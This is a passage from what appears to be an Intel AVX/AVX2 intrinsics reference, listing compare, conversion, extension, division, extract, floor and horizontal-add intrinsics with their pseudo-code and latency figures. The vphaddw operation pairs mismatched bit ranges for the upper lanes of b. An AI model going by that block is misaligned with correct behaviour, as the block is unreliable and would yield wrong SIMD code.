CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC FOR j := 0 to 7 i := j*32 dst[i+31:i] := ( a[i+31:i] OP b[i+31:i] ) ? 0xFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vcmpsd
__m128d _mm_cmp_sd (__m128d a, __m128d b, const int imm8)

Synopsis

__m128d _mm_cmp_sd (__m128d a, __m128d b, const int imm8)
#include «immintrin.h»
Instruction: vcmpsd xmm, xmm, xmm, imm
CPUID Flags: AVX

Description

Compare the lower double-precision (64-bit) floating-point element in a and b based on the comparison operand specified by imm8, store the result in the lower element of dst, and copy the upper element from a to the upper element of dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC dst[63:0] := ( a[63:0] OP b[63:0] ) ? 0xFFFFFFFFFFFFFFFF : 0 dst[127:64] := a[127:64] dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 3
Sandy Bridge 3
vcmpss
__m128 _mm_cmp_ss (__m128 a, __m128 b, const int imm8)

Synopsis

__m128 _mm_cmp_ss (__m128 a, __m128 b, const int imm8)
#include «immintrin.h»
Instruction: vcmpss xmm, xmm, xmm, imm
CPUID Flags: AVX

Description

Compare the lower single-precision (32-bit) floating-point element in a and b based on the comparison operand specified by imm8, store the result in the lower element of dst, and copy the upper 3 packed elements from a to the upper elements of dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC dst[31:0] := ( a[31:0] OP b[31:0] ) ? 0xFFFFFFFF : 0 dst[127:32] := a[127:32] dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 3
Sandy Bridge 3
vpcmpeqw
__m256i _mm256_cmpeq_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpeq_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpeqw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 16-bit integers in a and b for equality, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := ( a[i+15:i] == b[i+15:i] ) ? 0xFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpcmpeqd
__m256i _mm256_cmpeq_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpeq_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpeqd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 32-bit integers in a and b for equality, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ( a[i+31:i] == b[i+31:i] ) ? 0xFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpcmpeqq
__m256i _mm256_cmpeq_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpeq_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpeqq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 64-bit integers in a and b for equality, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ( a[i+63:i] == b[i+63:i] ) ? 0xFFFFFFFFFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpcmpeqb
__m256i _mm256_cmpeq_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpeq_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpeqb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 8-bit integers in a and b for equality, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := ( a[i+7:i] == b[i+7:i] ) ? 0xFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpcmpgtw
__m256i _mm256_cmpgt_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpgt_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpgtw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 16-bit integers in a and b for greater-than, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := ( a[i+15:i] > b[i+15:i] ) ? 0xFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpcmpgtd
__m256i _mm256_cmpgt_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpgt_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpgtd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 32-bit integers in a and b for greater-than, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ( a[i+31:i] > b[i+31:i] ) ? 0xFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpcmpgtq
__m256i _mm256_cmpgt_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpgt_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpgtq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 64-bit integers in a and b for greater-than, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ( a[i+63:i] > b[i+63:i] ) ? 0xFFFFFFFFFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpcmpgtb
__m256i _mm256_cmpgt_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpgt_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpgtb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 8-bit integers in a and b for greater-than, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := ( a[i+7:i] > b[i+7:i] ) ? 0xFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpmovsxwd
__m256i _mm256_cvtepi16_epi32 (__m128i a)

Synopsis

__m256i _mm256_cvtepi16_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxwd ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 16-bit integers in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 7 i := 32*j k := 16*j dst[i+31:i] := SignExtend(a[k+15:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovsxwq
__m256i _mm256_cvtepi16_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepi16_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxwq ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 16-bit integers in a to packed 64-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 3 i := 64*j k := 16*j dst[i+63:i] := SignExtend(a[k+15:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovsxdq
__m256i _mm256_cvtepi32_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepi32_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxdq ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 32-bit integers in a to packed 64-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 3 i := 64*j k := 32*j dst[i+63:i] := SignExtend(a[k+31:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vcvtdq2pd
__m256d _mm256_cvtepi32_pd (__m128i a)

Synopsis

__m256d _mm256_cvtepi32_pd (__m128i a)
#include «immintrin.h»
Instruction: vcvtdq2pd ymm, xmm
CPUID Flags: AVX

Description

Convert packed 32-bit integers in a to packed double-precision (64-bit) floating-point elements, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 dst[m+63:m] := Convert_Int32_To_FP64(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4 1
Ivy Bridge 4 1
Sandy Bridge 4 1
vcvtdq2ps
__m256 _mm256_cvtepi32_ps (__m256i a)

Synopsis

__m256 _mm256_cvtepi32_ps (__m256i a)
#include «immintrin.h»
Instruction: vcvtdq2ps ymm, ymm
CPUID Flags: AVX

Description

Convert packed 32-bit integers in a to packed single-precision (32-bit) floating-point elements, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j dst[i+31:i] := Convert_Int32_To_FP32(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vpmovsxbw
__m256i _mm256_cvtepi8_epi16 (__m128i a)

Synopsis

__m256i _mm256_cvtepi8_epi16 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxbw ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 8-bit integers in a to packed 16-bit integers, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*8 l := j*16 dst[l+15:l] := SignExtend(a[i+7:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovsxbd
__m256i _mm256_cvtepi8_epi32 (__m128i a)

Synopsis

__m256i _mm256_cvtepi8_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxbd ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 8-bit integers in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j k := 8*j dst[i+31:i] := SignExtend(a[k+7:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovsxbq
__m256i _mm256_cvtepi8_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepi8_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxbq ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 8-bit integers in the low 8 bytes of a to packed 64-bit integers, and store the results in dst.

Operation

FOR j := 0 to 3 i := 64*j k := 8*j dst[i+63:i] := SignExtend(a[k+7:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxwd
__m256i _mm256_cvtepu16_epi32 (__m128i a)

Synopsis

__m256i _mm256_cvtepu16_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxwd ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 16-bit integers in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j k := 16*j dst[i+31:i] := ZeroExtend(a[k+15:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxwq
__m256i _mm256_cvtepu16_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepu16_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxwq ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 16-bit integers in a to packed 64-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 3 i := 64*j k := 16*j dst[i+63:i] := ZeroExtend(a[k+15:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxdq
__m256i _mm256_cvtepu32_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepu32_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxdq ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 32-bit integers in a to packed 64-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 3 i := 64*j k := 32*j dst[i+63:i] := ZeroExtend(a[k+31:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxbw
__m256i _mm256_cvtepu8_epi16 (__m128i a)

Synopsis

__m256i _mm256_cvtepu8_epi16 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxbw ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 8-bit integers in a to packed 16-bit integers, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*8 l := j*16 dst[l+15:l] := ZeroExtend(a[i+7:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxbd
__m256i _mm256_cvtepu8_epi32 (__m128i a)

Synopsis

__m256i _mm256_cvtepu8_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxbd ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 8-bit integers in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j k := 8*j dst[i+31:i] := ZeroExtend(a[k+7:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxbq
__m256i _mm256_cvtepu8_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepu8_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxbq ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 8-bit integers in the low 8 byte sof a to packed 64-bit integers, and store the results in dst.

Operation

FOR j := 0 to 3 i := 64*j k := 8*j dst[i+63:i] := ZeroExtend(a[k+7:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vcvtpd2dq
__m128i _mm256_cvtpd_epi32 (__m256d a)

Synopsis

__m128i _mm256_cvtpd_epi32 (__m256d a)
#include «immintrin.h»
Instruction: vcvtpd2dq xmm, ymm
CPUID Flags: AVX

Description

Convert packed double-precision (64-bit) floating-point elements in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 3 i := 32*j k := 64*j dst[i+31:i] := Convert_FP64_To_Int32(a[k+63:k]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 4 1
Ivy Bridge 4 1
Sandy Bridge 4 1
vcvtpd2ps
__m128 _mm256_cvtpd_ps (__m256d a)

Synopsis

__m128 _mm256_cvtpd_ps (__m256d a)
#include «immintrin.h»
Instruction: vcvtpd2ps xmm, ymm
CPUID Flags: AVX

Description

Convert packed double-precision (64-bit) floating-point elements in a to packed single-precision (32-bit) floating-point elements, and store the results in dst.

Operation

FOR j := 0 to 3 i := 32*j k := 64*j dst[i+31:i] := Convert_FP64_To_FP32(a[k+63:k]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 4 1
Ivy Bridge 4 1
Sandy Bridge 4 1
vcvtps2dq
__m256i _mm256_cvtps_epi32 (__m256 a)

Synopsis

__m256i _mm256_cvtps_epi32 (__m256 a)
#include «immintrin.h»
Instruction: vcvtps2dq ymm, ymm
CPUID Flags: AVX

Description

Convert packed single-precision (32-bit) floating-point elements in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j dst[i+31:i] := Convert_FP32_To_Int32(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vcvtps2pd
__m256d _mm256_cvtps_pd (__m128 a)

Synopsis

__m256d _mm256_cvtps_pd (__m128 a)
#include «immintrin.h»
Instruction: vcvtps2pd ymm, xmm
CPUID Flags: AVX

Description

Convert packed single-precision (32-bit) floating-point elements in a to packed double-precision (64-bit) floating-point elements, and store the results in dst.

Operation

FOR j := 0 to 3 i := 64*j k := 32*j dst[i+63:i] := Convert_FP32_To_FP64(a[k+31:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 1
Ivy Bridge 2 1
Sandy Bridge 2 1
vcvttpd2dq
__m128i _mm256_cvttpd_epi32 (__m256d a)

Synopsis

__m128i _mm256_cvttpd_epi32 (__m256d a)
#include «immintrin.h»
Instruction: vcvttpd2dq xmm, ymm
CPUID Flags: AVX

Description

Convert packed double-precision (64-bit) floating-point elements in a to packed 32-bit integers with truncation, and store the results in dst.

Operation

FOR j := 0 to 3 i := 32*j k := 64*j dst[i+31:i] := Convert_FP64_To_Int32_Truncate(a[k+63:k]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 4 1
Ivy Bridge 4 1
Sandy Bridge 4 1
vcvttps2dq
__m256i _mm256_cvttps_epi32 (__m256 a)

Synopsis

__m256i _mm256_cvttps_epi32 (__m256 a)
#include «immintrin.h»
Instruction: vcvttps2dq ymm, ymm
CPUID Flags: AVX

Description

Convert packed single-precision (32-bit) floating-point elements in a to packed 32-bit integers with truncation, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j dst[i+31:i] := Convert_FP32_To_Int32_Truncate(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vdivpd
__m256d _mm256_div_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_div_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vdivpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Divide packed double-precision (64-bit) floating-point elements in a by packed elements in b, and store the results in dst.

Operation

FOR j := 0 to 3 i := 64*j dst[i+63:i] := a[i+63:i] / b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 35 25
Ivy Bridge 35 28
Sandy Bridge 43 44
vdivps
__m256 _mm256_div_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_div_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vdivps ymm, ymm, ymm
CPUID Flags: AVX

Description

Divide packed single-precision (32-bit) floating-point elements in a by packed elements in b, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j dst[i+31:i] := a[i+31:i] / b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 21 13
Ivy Bridge 21 14
Sandy Bridge 29 28
vdpps
__m256 _mm256_dp_ps (__m256 a, __m256 b, const int imm8)

Synopsis

__m256 _mm256_dp_ps (__m256 a, __m256 b, const int imm8)
#include «immintrin.h»
Instruction: vdpps ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Conditionally multiply the packed single-precision (32-bit) floating-point elements in a and b using the high 4 bits in imm8, sum the four products, and conditionally store the sum in dst using the low 4 bits of imm8.

Operation

DP(a[127:0], b[127:0], imm8[7:0]) { FOR j := 0 to 3 i := j*32 IF imm8[(4+j)%8] temp[i+31:i] := a[i+31:i] * b[i+31:i] ELSE temp[i+31:i] := 0 FI ENDFOR sum[31:0] := (temp[127:96] + temp[95:64]) + (temp[63:32] + temp[31:0]) FOR j := 0 to 3 i := j*32 IF imm8[j%8] tmpdst[i+31:i] := sum[31:0] ELSE tmpdst[i+31:i] := 0 FI ENDFOR RETURN tmpdst[127:0] } dst[127:0] := DP(a[127:0], b[127:0], imm8[7:0]) dst[255:128] := DP(a[255:128], b[255:128], imm8[7:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 14 2
Ivy Bridge 12 2
Sandy Bridge 12 2
__int16 _mm256_extract_epi16 (__m256i a, const int index)

Synopsis

__int16 _mm256_extract_epi16 (__m256i a, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Extract a 16-bit integer from a, selected with index, and store the result in dst.

Operation

dst[15:0] := (a[255:0] >> (index * 16))[15:0]
__int32 _mm256_extract_epi32 (__m256i a, const int index)

Synopsis

__int32 _mm256_extract_epi32 (__m256i a, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Extract a 32-bit integer from a, selected with index, and store the result in dst.

Operation

dst[31:0] := (a[255:0] >> (index * 32))[31:0]
__int64 _mm256_extract_epi64 (__m256i a, const int index)

Synopsis

__int64 _mm256_extract_epi64 (__m256i a, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Extract a 64-bit integer from a, selected with index, and store the result in dst.

Operation

dst[63:0] := (a[255:0] >> (index * 64))[63:0]
__int8 _mm256_extract_epi8 (__m256i a, const int index)

Synopsis

__int8 _mm256_extract_epi8 (__m256i a, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Extract an 8-bit integer from a, selected with index, and store the result in dst.

Operation

dst[7:0] := (a[255:0] >> (index * 8))[7:0]
vextractf128
__m128d _mm256_extractf128_pd (__m256d a, const int imm8)

Synopsis

__m128d _mm256_extractf128_pd (__m256d a, const int imm8)
#include «immintrin.h»
Instruction: vextractf128 xmm, ymm, imm
CPUID Flags: AVX

Description

Extract 128 bits (composed of 2 packed double-precision (64-bit) floating-point elements) from a, selected with imm8, and store the result in dst.

Operation

CASE imm8[7:0] of 0: dst[127:0] := a[127:0] 1: dst[127:0] := a[255:128] ESAC dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vextractf128
__m128 _mm256_extractf128_ps (__m256 a, const int imm8)

Synopsis

__m128 _mm256_extractf128_ps (__m256 a, const int imm8)
#include «immintrin.h»
Instruction: vextractf128 xmm, ymm, imm
CPUID Flags: AVX

Description

Extract 128 bits (composed of 4 packed single-precision (32-bit) floating-point elements) from a, selected with imm8, and store the result in dst.

Operation

CASE imm8[7:0] of 0: dst[127:0] := a[127:0] 1: dst[127:0] := a[255:128] ESAC dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vextractf128
__m128i _mm256_extractf128_si256 (__m256i a, const int imm8)

Synopsis

__m128i _mm256_extractf128_si256 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vextractf128 xmm, ymm, imm
CPUID Flags: AVX

Description

Extract 128 bits (composed of integer data) from a, selected with imm8, and store the result in dst.

Operation

CASE imm8[7:0] of 0: dst[127:0] := a[127:0] 1: dst[127:0] := a[255:128] ESAC dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vextracti128
__m128i _mm256_extracti128_si256 (__m256i a, const int imm8)

Synopsis

__m128i _mm256_extracti128_si256 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vextracti128 xmm, ymm, imm
CPUID Flags: AVX2

Description

Extract 128 bits (composed of integer data) from a, selected with imm8, and store the result in dst.

Operation

CASE imm8[7:0] of 0: dst[127:0] := a[127:0] 1: dst[127:0] := a[255:128] ESAC dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vroundpd
__m256d _mm256_floor_pd (__m256d a)

Synopsis

__m256d _mm256_floor_pd (__m256d a)
#include «immintrin.h»
Instruction: vroundpd ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed double-precision (64-bit) floating-point elements in a down to an integer value, and store the results as packed double-precision floating-point elements in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := FLOOR(a[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vroundps
__m256 _mm256_floor_ps (__m256 a)

Synopsis

__m256 _mm256_floor_ps (__m256 a)
#include «immintrin.h»
Instruction: vroundps ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed single-precision (32-bit) floating-point elements in a down to an integer value, and store the results as packed single-precision floating-point elements in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := FLOOR(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vphaddw
__m256i _mm256_hadd_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hadd_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphaddw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally add adjacent pairs of 16-bit integers in a and b, and pack the signed 16-bit results in dst.

Operation

dst[15:0] := a[31:16] + a[15:0] dst[31:16] := a[63:48] + a[47:32] dst[47:32] := a[95:80] + a[79:64] dst[63:48] := a[127:112] + a[111:96] dst[79:64] := b[31:16] + b[15:0] dst[95:80] := b[63:48] + b[47:32] dst[111:96] := b[95:80] + b[79:64] dst[127:112] := b[127:112] + b[111:96] dst[143:128] := a[159:144] + a[143:128] dst[159:144] := a[191:176] + a[175:160] dst[175:160] := a[223:208] + a[207:192] dst[191:176] := a[255:240] + a[239:224] dst[207:192] := b[127:112] + b[143:128] dst[223:208] := b[159:144] + b[175:160] dst[239:224] := b[191:176] + b[207:192] dst[255:240] := b[223:208] + b[239:224] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 2
vphaddd
__m256i _mm256_hadd_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hadd_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphaddd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally add adjacent pairs of 32-bit integers in a and b, and pack the signed 32-bit results in dst.

Operation

dst[31:0] := a[63:32] + a[31:0] dst[63:32] := a[127:96] + a[95:64] dst[95:64] := b[63:32] + b[31:0] dst[127:96] := b[127:96] + b[95:64] dst[159:128] := a[191:160] + a[159:128] dst[191:160] := a[255:224] + a[223:192] dst[223:192] := b[191:160] + b[159:128] dst[255:224] := b[255:224] + b[223:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 2
vhaddpd
__m256d _mm256_hadd_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_hadd_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vhaddpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Horizontally add adjacent pairs of double-precision (64-bit) floating-point elements in a and b, and pack the results in dst.

Operation

dst[63:0] := a[127:64] + a[63:0] dst[127:64] := b[127:64] + b[63:0] dst[191:128] := a[255:192] + a[191:128] dst[255:192] := b[255:192] + b[191:128] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
Ivy Bridge 5
Sandy Bridge 5
vhaddps
__m256 _mm256_hadd_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_hadd_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vhaddps ymm, ymm, ymm
CPUID Flags: AVX

Description

Horizontally add adjacent pairs of single-precision (32-bit) floating-point elements in a and b, and pack the results in dst.

Operation

